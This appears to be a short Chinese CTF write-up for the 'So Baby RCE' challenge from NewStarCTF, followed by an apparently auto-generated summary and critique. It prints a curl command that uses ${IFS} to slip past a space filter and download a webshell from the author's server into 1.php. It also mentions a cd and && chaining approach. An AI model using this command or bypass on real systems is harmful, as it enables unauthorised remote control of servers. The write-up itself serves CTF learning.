阿弥诺斯 这题在buu将赛题转出来以后做的,貌似与别人的做法都不同
过滤了许多东西 但是没有过滤curl,于是使用自己的服务器,让其下载一个木马进去即可
curl${IFS}xx.xxx.xxx.xxx:xxxxx${IFS}-o${IFS}1.php
于是我们直接就获得了权限
这题网上的WP是利用cd 和 &&连接符来RCE
算是非预期?
[NewStarCTF 公开赛赛道]So Baby RCE
Original
rest
... Reads
这篇博客介绍了NewStarCTF公开赛中的一道题目,题目名称为So Baby RCE。作者介绍了自己的解法,即利用curl下载木马并获得权限。作者指出,该题目过滤了许多东西,但是没有过滤curl,因此可以利用curl下载木马。作者还指出,网上的WP是利用cd和&&连接符来RCE,而他的解法算是非预期的。
该篇博客的优点在于作者简洁明了地介绍了自己的解法,同时也提到了其他解法。然而,该篇博客也存在一些可以改进的地方。首先,作者没有详细介绍题目的背景和要求,这可能会给读者造成困惑。其次,作者的语言表达有些含糊不清,有些地方需要更加精确地说明。最后,该篇博客可以加入更多的细节和技术,以便读者更加深入地理解该题目。
总之,该篇博客提供了一种新的解法,同时也提到了其他解法。作者可以进一步完善该篇博客,以便读者更好地理解该题目。